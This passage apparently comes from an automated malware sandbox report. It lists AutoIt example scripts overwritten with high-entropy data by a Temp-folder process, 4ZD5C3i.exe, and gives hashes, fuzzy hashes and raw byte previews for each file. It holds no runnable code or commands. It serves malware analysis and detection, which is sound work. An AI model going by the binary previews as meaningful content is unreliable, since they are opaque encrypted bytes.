                                                                                                                                                                                                                                                Preview:3..[.pI........#c/..$.....8....?..&.q.....bX.4V...T.#..<....f.....w.70......)J...I...W..1..p..X..".X {ds?..}.H....B%#Q.wI%[k...:..._...g.8..=BB[._7..Q...&.+..!..g..W.3..3...6..n.=..V.....P.-.aa.9..]....=.=..A.....sV...&k.a:.^...q.K~.....l..$@=.>....^>.];...a....piJ........d.a.....H.DOAm._>......=.&Y.l8d&l<y....::...D..x(....>.C.e/.oLbh.$z..`.uC#.J.t........C.0.Te.L..+...84.U...ZH...J.".7...d.(*$V.....G.v....^.(.,..lH.I{..d.....|..pf.].%>...q.....G.\..N...z...]a8V)OJ.v.a...?Y2...V..bOi..d...].......H....|K..._.."..)..:\ m...L'.9N...A.8.^...+y.3tE...ci....]...b.|.R)!ImA...IX...o.*x..d?.Q....^"...u....O{.&...q.''....[^.]...<..v..].oWn.{-..B.N6K... .F.:.I.g8}..iS..1z..&{.U.7...."...........J;. ...9.U.._r._.w..5...R...(K.1.....\.!.X\P..C...^...v.e..|g.....%..c$....L..d..cT.RAT....q9...'.....'..Z.<..m....&.. v.k....."s.....[.=...B.&T.W.......v..6.9...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8...

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\BitNOT.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1025
                                                                                                                                                                                                                                                Entropy (8bit):7.765122521683573
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:YSROzAEUpzCFOz+oW2ijmJrc0YXUZtwsT2X:YqCspzKcNW94o0jZtwdX
                                                                                                                                                                                                                                                MD5:7487A090139253BDA0725F0295E0D36B
                                                                                                                                                                                                                                                SHA1:D1877DB9EB4C7823ADB4468B7AFBE9463AA1C427
                                                                                                                                                                                                                                                SHA-256:3455EFF937FDA55685C6515D8F3297D6DF9E512D62DE4ADBA6C9FDAF1C6598EB
                                                                                                                                                                                                                                                SHA-512:A81753042FB534C3664845E5B0B29DF6F64A9C1F1278C0F371CEC227E14F07570F016F60A298536AC7D809F4B43E90018430B3B33BEF6708EB77A34D8057A259
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:}..).Jg../......\..:t....FJ..hAMQO.W...q....Bf>.."...{..d..|+6k.......+.j...H....Z8...t......i.n.....zS7.=./u...J.P./........u..B.2.,t&....}!..,.tt9.h^6......=....=\-:M."ps....j.....j.*.NV&.D.(D.3z.YB-u.z...E.G.w^..>.f.5.6.a%/....9J..[...Q....u....P.....-.zL...u...PL-...;.V._....WTm..0....s...o).*......x..o.^U\|m..i..P..8.z....Ai."<...v.J).E.v.%?..9. =..'.v....S.Z#..........$_.m..m"..;....?^<..Nz....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..lrp.{...p..X..R.~...h.~r|....9...?...

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\BitOR.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1545
                                                                                                                                                                                                                                                Entropy (8bit):7.852825360017206
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:rlt8/BcPo899R5NoBZSgsIIJXK+nHgNmmJ2aFPR7EwkjmJrc0YXUZtwsTfu:RtWWxJ8ZSJNn824PR7zq4o0jZtwMu
                                                                                                                                                                                                                                                MD5:2C7DF24CB3E1576B7750A87E789FD6EF
                                                                                                                                                                                                                                                SHA1:A0F0F0E6FADC3ADDD609CB9E2D7CDD85F2D47DAE
                                                                                                                                                                                                                                                SHA-256:F73C3294D3E3835F81CD547F34B1BAA663DE9CAB6CD9A02AAAA4E73D6CB51679
                                                                                                                                                                                                                                                SHA-512:754FA97568CEF2F5C88687443B392E3A884F58F14227DB3F1EF06ECC19D2EE2EEAD0EFB941819A3E15F1783FAE9429CC3A8DC4094456D290560F7B471DD4662B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..9Zpw..Dd.2....Be.a...H.f.u..iE>....K[NL.C....9.G5....b.........f".p...h..NKz.9pC:G.........n.L..T..A..;.......`._.R..p.:....M.......j.Z.2Nr.z.8.>..D.. ..(..!T.7QOe.(..(.g....=.X.z,...)...tOV...\$&..1d\r.gU..O.E....~5...7.^:..v..-............M.^..Y.^*.7...l.\..Bp..dCx....$P...{.t-.9..t..-QK........?.B..0..8<A..\.3P...M.S..y..L.-.`.E..u..Iz.S...<..s.jy..r.6h..[p.JVY+(........I.RNfv.kk".(m3.$.?.r.J).)W.....q1.%....|C..izg..O..b.3m|T.PU.(..J.-q.Ngq.^E..wC9.7H....C.c..{T.Kw.?.zg..H&.#c./....V..xY..\........sE./0h.Q.y'...$.w.v|.......p.AW.LQ.`....D...Z\..2.U..v.jE.B......}.1r.....q..\..7^......F.<...ZD.z..^U.'..S..?.z%..t...ylPl.....G...0..1.N.%CA.W".U.qH.|....t.?......Q....AP{.W...B....X.,=.......f.!.W.@.b.IG..@..U.^c..........~..?.>.<L.T.....<6....,Y.(.Ic-.?y.mN.......>5.+...A2.n.q..........-(.o.x....}...7...(Y...cg...ZMG.......I..k..K.dQ...).yd..H.<-.v.M.`.\.h....rU.2%..dP....I...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\BitRotate.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1851
                                                                                                                                                                                                                                                Entropy (8bit):7.879530718372489
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:RE9ApMrfE+HCAVw1sYsgPFrEwPSVQgh4haRPFv//5eLui7jnRePHY5DjmJrc0YXC:RE9LF1GPWyM7norwPHY5H4o0jZtws
                                                                                                                                                                                                                                                MD5:0C0E5662384EDC6BF617AA9CC10BBD93
                                                                                                                                                                                                                                                SHA1:6899818F6A13067943EEF56A1104E15FDB1070E2
                                                                                                                                                                                                                                                SHA-256:31F8866FAE6CEF37BD8BD2432F5FB8771CEE78EA0579EB28C5813921173BE9D6
                                                                                                                                                                                                                                                SHA-512:EFE4410B7EC557C8DC1046B286F657CB2925C1D53F77A1499695B3F5CDAB105407D89852D9FADB1EFA07AFE58A0AC3C79091BD8EF3C41E2C08B1774982AEB6C0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:/N8..a.#,T...%.....f&..&#?r.....*\].Q..b{.T......."..>.:...."c/;..s&d{......}.Oj.d.Y.....q+j....}.r..e.....vy6.g^.u..%.<.&i.>....x/..B.G.X.k..z...........#d...??...@.~..rN{...>{.)........".".D.5..sF...c.I.+1*.)v-....C..8....Ny@;.0.J.....].?.*.....Ef&..D.x..7#.?..!...r.K.i.......).U.......c.e..W...._U8...O...<...E..P.y7LkVQy.`.....b._....C.......tO.kr*.*.........,.........aO...D.T.+...Z..o$.....V..9n..O......l......NP3...#....%.j6....g&...'?.......KI...1.......V..Q.!:.;.<.7...?\M..$9........Y.../.T?.;..Xi].._.X.4..H..1....|......f.<.1.?'.2SA.......5.l.T!.o.9...........$.#G....s...g.......+....PG#1..&zL....|D.?......S..w.@#V..2...b?.Z..[..Z.....b.^....I.;..Q...(. h.&N.g..w...h........s.F.*...y...I.x....'..qy...[..N.x...R...%.|9.L..a.[..S.h.T.....c}0..R...w......7y.^.EV.$..B.Swio+....x$7.M.5EUC............+.......x..........#....L.%.a.L..jd.`... ....?..2.g./...7..c..aPT.7KD....z.(.z...j|>.5.wVy.k .\............R%O...#..9.%..)v

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\BitShift.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1801
                                                                                                                                                                                                                                                Entropy (8bit):7.88835974455501
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:F6NRuYvX6Torr2M+krrH7WFhtjSH14zzrbf3MGsNJmx+zLHIJMwrlSa0jmJrc0YJ:Fb4Xf3OkfKx7rPW7IMLV4o0jZtwf
                                                                                                                                                                                                                                                MD5:5335A154550E7490E4AA5CEB3C0AF5E1
                                                                                                                                                                                                                                                SHA1:777BE34A9137C570D60B0760A4B86F7332467EF9
                                                                                                                                                                                                                                                SHA-256:8C1079EF621D843AC07698F15F170A04FA5F0D305744BE9DAF9F1A7BADEB706F
                                                                                                                                                                                                                                                SHA-512:6830D7F8BDFE7EE0C6C46E7A22992D66A61C441C9D2D716E149987FD8505C908679468C68C407901D4F1E3045B4EB8D181773D6BC40CB86FF925F931F57A02FA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:c%......Q...,n..#.....F.=..3l..O`..ij.*.z.Hb...(!.Z)..,A,rso....^.."..,..i..-K@..`.......2-.).......].iK...o b...J%.<..u.*......$q=".........%....GS..|*r.{..p.cv.Tz.R=..).0...U....4.$..M..CNbT&.....*..\.....R..N..r..)D......rE..k...`..K.......L..,."..WS.2%....a+~41..L|.....k.......,_...W9..m.RG...;]..LD.K....l[.A..F..5.umV<.>@....;yIB.q...!..OB...e..v~^KG...l....%.u._..5@T........6.\...I..&...5,.%.s....a..x...'Q..h....O;.....L@.U.../..dk."xk%.~.=.K..+.O.}. ..sv..,..K.C.J..mc{.&d......xj....3d....5...u5......e{......P..-...3.:. jj/.X4T...2.&Aj...".....C._)..j......r[..... 9z.....D...-.z6..:......v.G.W..d.i.H.{-.W`N..~..K..xn..o..3....!.....^ 0..f....,..`....^F0...5...^..... xH.Yryh* ...E7H..2..eQf(....u3.@..fej....3B..~.baz.c=#........g.......(*R(Kk..C.../=.8..vh.!...=..P.B..%p...PG8.&i....u..Z.ga..4......]!...8R*4S./;...R,K...[.g..y......x$+:U<e[..j..w.A`d...X.L"&.9..(.'@-.?..~.Q. f:.........n.\..\?..+..\..T.G97.1 .....~%5..A,g.....

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\BitXOR.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1566
                                                                                                                                                                                                                                                Entropy (8bit):7.860564687425598
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:bUx2wa43JzFotkh16qtpfPbs4o0jZtwQcp:IxfzFo8162leHp
                                                                                                                                                                                                                                                MD5:4A06DDCF266C9353E0B42FB462B18D4D
                                                                                                                                                                                                                                                SHA1:91F302F008A895AB6F33BE162A38F7615D476CF4
                                                                                                                                                                                                                                                SHA-256:752638F9CA0C81BE32904F985ABE693EB070AD583CF4F622EC034B9C4E9D44EC
                                                                                                                                                                                                                                                SHA-512:FAF6F1A19349670D03B99549B7A7A7134DC1CEB6652DFE4D76F0B28029617D4F5C00B7737EC6734779AEB0CB3DDAFF20CF81D45945DFAEF90AC463E7BB6E7ACB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:s...R1........0..ab.aJ..W./.i...4^.Q.D!ZdJ*..F.d.y.R.U.R:Cy.u9M.....hnD..<RY....E....1.(L...|V.@Y..K5`..J~...!.GGc'rp+..s'.Yx....r......O>.].E.r...eP....A@..tf.....b.j.9.ej2.....^"-.{.L9....%d++../.._K..4.O.@U.<V..G.?.X..6.......$..0@....t../..IW..".a ....78.Z...A.q..S.p...".t..K\...K.E.3.6....Qc..h..X^N7........N.~;JQn....."zt.#F3m.......!&{.#.X..asW.}Xr..|..~.......f......D.(C.DA..\....y@..x...a..v...?.5;.AJ.;W.43.d...y.....\W..P..,...7...i...F...Z.c.%...D...i......P`..S.I....@.......+..........h..w........J....>..Yz........4..0.a<J..p.......q.!...y.d.Y.t.dZ.{..........'s....|...a.%....sf.....-..2E..:...Q...3"!.....mH...H..[2....A.|..j.+U...Q.XX8.O.||.<.5..H...w.z~..^.B.....@...A)X..}.A1G..9.N..<.T....?n..m.2.8.^D.B..F.j.....|7_.L.*\J.|...w.${s.....G..5|.R#%S..........@.v...z*......9.`zv1.v~.p..`O4.....P.;*24.J7ki.....6....`.%.6.4].....C.Y.W..B;.a..3E.D)...P.~.@.......9....M.)+..P....$i..*d.S.h.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\MapRemove.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2330
                                                                                                                                                                                                                                                Entropy (8bit):7.919690447086896
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:ELSH6drh3ABTDA+Ji6nva/1Mz+3tWXG4o0jZtwD:+HVE3AYi6nvbz+oleD
                                                                                                                                                                                                                                                MD5:050153D08561400E0EB6350CE8854684
                                                                                                                                                                                                                                                SHA1:16F9C2AA93517E57E538567D01CF69E92243E1B5
                                                                                                                                                                                                                                                SHA-256:8003A76E2D38DCE6E294C3C95B8AFF0F0EA100C31BC05E8690C65F0CBFD85450
                                                                                                                                                                                                                                                SHA-512:D68FACEA84A48A5365EF74C507E7304C5632B88673C2260B8393BA12F8EF7B6D4B135AC69844716AAD6F6B02A95E5F79FDDF9946C0E7695D885EF340DD0F7AE0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:1...N..S..R<o....=.....R.<.....1.R}1.g.Y..qf.g....F....Q..._.f.0G.X...........k..0.l.....m5X.........c.......}.....).0...".4.:N.. 7nC....L2g.%N.<...z.:T.E..v....c3.H{E.>.gb.Q=H..r...w...'s....@.(.n..B....C}..P..gz|.f...~.K...&.P k..Pcs.u.V.|N......x...A..a....m.>m |s....i.Bk.Ykp...7h!..r.$`..$....).t....7,n.P....u.=Q.N..H._.2{.f.Q..Q<...1.Ty..=.)....G....].....>.).]....=.&-..6......N..t-a!.....Y.<.$......M..I......A.z.........D...B.$..n..<.N..}...5...Co.E.{SvY.$.|jn~T..S.../..f..X....U7..@.v..0..h)X...}K........Y6..(.`w.T....=.#..G..{...8....8...CS.....j...J[q....]..kU..l.&..{.!....I....Rb.......&...|y.Q.J.B.X.u..-.c. ........S..F.,m.^..N......W.IE~.FT$.C....._.G.P*.;w@=$.......u..u^;4...2.G.:.../y.I'yFg...]:x} ...*.heco.....b...Y..k.E(.H[.".;......n...Tz..vt.'w.{,M..tE`....B.N.B.J.oQ..a...g...b...%.A......&..#.......VP...=..f.3cp.I./O.......x..xp.....,.8.>..%bf.5...X...3.#j,..o.?.waU...N.IgI5.X...*....#...$}6...WU.@}6...!......O(

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\MemGetStats.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1795
                                                                                                                                                                                                                                                Entropy (8bit):7.903983373613784
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:Wu/nZM87mGkHNKERWFsY9tqDTU5eYioFEW7gFtUIjmJrc0YXUZtwsT4V2a:dG8YQzb0TETpsUW4o0jZtwBVd
                                                                                                                                                                                                                                                MD5:1124E110086AF5A7B5864A9E6D3B5237
                                                                                                                                                                                                                                                SHA1:EFFBF0BD3034504228F195ED9518D449CD3576CC
                                                                                                                                                                                                                                                SHA-256:CAB6DE7C7ACAEB8590560635B149A1BFCA9B057CD741E41AE7C1D6707DA692C7
                                                                                                                                                                                                                                                SHA-512:16B9E9F8B01ECB7E057C3FDB5FED57FD5D82EC03647D316CFA3CF1AD132F1F1B9A77A11A3821144A47B2F9A26CDE13EB9E991C6BE023409EB994F3A895AB869B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.ICi..X........\... .}%..N.....W..w..o{.jX4....R.3....g.!~....B...$u..f9e.i.w..}6.~.y.B.da../:.)...W..i..3...~l.Xc..S...n.......c?......@.u:..}A.[.I.....*._..D.T@5~...X....<..|.C...Y.k.mj.W-...T..l....jGz...V;...(.2.M.C...*.Q.5.H.e...Mp.(.....X.L/O.M...r9...Q...Jt....X./2..-.GQg.5..[)..K.....w1......:t.f...z$..0..g..]w.....'.-.F.j.gc...Z~F...v.........C.bN.{....E.!.j..1.H.3.U..O*.d...nt..n.?.......$[......}..c..R...w.(.N>x.A...........1(#....T\$.'...`R.]...s.IE.1f8 ....v..3.<!...Z...,..:.U#...6~b.tX.*......z....&.....&..b.&?6.qd..w....|.i>....,J0.sn.......'P&Sb.V0S..P.M..mC#`..F..n50v.....v.... .O..5...^..1....#..i.!a....j..#.B...bMK;..Fw...B......j..1.[.2t.?Y..$.Z...U....u.}....d.>...*.~..r.Q..C.OwIT[U+g...?e....'.9:{6?c...."..t.(;.....&R.r...}."..wHHG..?...aCp....z..jB....zE.F....H.....3..W..%..Q]...9.... 4.v.L.u....+..k" '.....g.\DE....._...7...g...@.2.t.t..[...._....U*..Xg;.@..?#.aC...Gu.......Dr.....1..).KP8.Q'. .C*...a..`.+.".,@

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Mod.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1408
                                                                                                                                                                                                                                                Entropy (8bit):7.842546940507605
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:exobzIcnTG39ZO7OA+h6j1kwQqBhHQYSqjmJrc0YXUZtwsTIIA:exazRyN8x+hgkwVBhHQG4o0jZtwZIA
                                                                                                                                                                                                                                                MD5:B599599D30BC5F31F5AF2DDD9B206688
                                                                                                                                                                                                                                                SHA1:9908203E28F535751E8D06220CE9C0CC574FE520
                                                                                                                                                                                                                                                SHA-256:05146888A870FC25F6A722E2EB9E456C5C04FEF65C8CC4BD3425EA680D459AA5
                                                                                                                                                                                                                                                SHA-512:C9B373947D7DE58A53A93AA8A9071E34B459126D767A7D4CED8356E637AE62DC8D23923C08D610026D7377FA3F69F664EC55E8D80942FDDC032C62C18A049866
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.;..ed.....o.SS/....r.;)*.....J.v$..........V./.o.B.%k(.Q.*n_].wKr6{.....r.XV.2.....4c..Vw.}...$q+..& .F...@.W.l...... ...L... D.....%......g......y.Q.tKr....9.{.Ju.n.BK.;....E.>.....r.o....%........l...s....2.]....:.....o)..I.(...I.B..R.9Ns......N..y.....7j=..'.:xI.GG.<\..z...="]....D.4.e...\Z....|.G..7X5.6..\ .....K..w.]...8...yX.....es.v...G...n.2r.Fx..8wZ.....MC.ZZ........6.;...V...4...-.+..._E<....]..?.!k.....H........X.)f._%..4.&.2....'..w@r......4{_....A.....<.s.....{. .....E.....I9c)8...J.v.i.b..e..Q...>i....\2.L....F._..7+.*,.[.Y...F.8UD...{.JT<].....b..).4.B.R...P..qq..........k.t8\Q......|q..P.).q.....s..Y..n.=.m....>c..m0..K..8z.x<.... .-...o...B...nA...6~......JlI;.".j..................{!.p....WGV}....Fv.8..X..p.....#.....5.v{+K..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\MouseClick.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1014
                                                                                                                                                                                                                                                Entropy (8bit):7.782074917733637
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:O7+PyfcDpU5ZWaudAMu65EuG92jmJrc0YXUZtwsTMvqyK:O7+KMEQo1J9I4o0jZtwKZ
                                                                                                                                                                                                                                                MD5:0DA814CA93893DEC1DBED323346FD164
                                                                                                                                                                                                                                                SHA1:98279495E1129306AF23A4B8AF78F68F5430B98D
                                                                                                                                                                                                                                                SHA-256:63B6E7CAFB2AA32B500A74309E64DB73E0BD9EAF406DF047187B6F079217969E
                                                                                                                                                                                                                                                SHA-512:6EE5C1F4BDA38D2D766DC55B3B4796B01AE945B4A7FF7BC9C93E0302F38282F9D16B2AD9FD90F51FF6B27D05EE060AC02698B04A49090893521265102C9F3F02
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.OXr.[o...7......M8.z.Tb...#!wt<]l..X..{.7~.Gh.g{..."..@....)..qi.`.Ta.......G..Q.j..+F.@.}=f...".S..q..j.........e......5C..a.+...0.3.X..z&?..k....oJ.\...!.n...^.....|.b..A.a..%.G.O?p.1!A.+h..< ..q...\.*h........^e=..........7^..pj.z.G@2.._...R.Q..Y.o.3@......Wi..A...I..?.;`.J..5....b.3.5.Q"Hp.6..Cs.h..........l....(v.!.NW4...?.........V..<6..q_.fK..Su...!....]d..)..0."_.&.tB.J.?K..u5....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.qV.n/.X?.$.g...".Z......{*..Im.G+.BY..............

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\MouseClickDrag.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):740
                                                                                                                                                                                                                                                Entropy (8bit):7.694755804572411
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:QIDffPEqJiejaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZk6KSXllC:QIDXPTJvjmJrc0YXUZtwsTlKaC
                                                                                                                                                                                                                                                MD5:406101F14E5716A205C5E6B58AADBF5F
                                                                                                                                                                                                                                                SHA1:B7F56B27366E0E03C4338520EA3B43D82AD38923
                                                                                                                                                                                                                                                SHA-256:ED462B0DCC28D29FD12B2827A72DB3A61177C514ECD4CD6E5A4DDB29B2AA93C1
                                                                                                                                                                                                                                                SHA-512:5962188938758A68F2E8240C5D9C4CB7D3ADB9B22C764215F4C386B6519BF3F83552E5A090CA6A64E03393DB402974EDF1392C438AAF3CBDF6C712AF4BAB377F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:J#J}...).._z.,V.T.....;V.....p.'...+RN.....^[@.v..&p...3.#.'..p...q..jkd.............PM....a...j+..F..c....6!.)O..O.`.o...r.....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$....6.*.m..q/!.8..<....._..#2..0@Q..+....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\MouseDown.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):796
                                                                                                                                                                                                                                                Entropy (8bit):7.701667420497207
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:7rZHSMCPMTo4uXDQhwknDjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO19:7r4MvcD8ikDjmJrc0YXUZtwsTuI
                                                                                                                                                                                                                                                MD5:CEAB986A030CB901D476B4D684666A73
                                                                                                                                                                                                                                                SHA1:3EA60AE621A7CFB4276EC84D5BC5627E28D9400A
                                                                                                                                                                                                                                                SHA-256:49ADF00C00F7C997ED7B1C94CB81CCAC73DFA3A34E3394AFEAD412931ED6059C
                                                                                                                                                                                                                                                SHA-512:BFB1D1A73E5FC74850457F71332C4D6D23B743E328A7B703060E4D3930D06767E1C59AB2A09215BBD41A98FF2CC3E3AFF183E6F63391D40C4826FBC80F4E4F30
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:OA..N....w`....'.T#........@;8..^..........tH..%H..@h@@..._...*..vy.....(.A..6UQ9 ..Z.;......F.........5......R...-..`.......0.3Cr_z4.1.MM}!HE.D5.>.c..?f:.<.......,.s..z^Y`Z.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$....U +p.r0.$......h..i....a6..x...'....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\MouseGetCursor.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1401
                                                                                                                                                                                                                                                Entropy (8bit):7.8291561408320725
                                                                                                                                                                                                                                                Encrypted:false
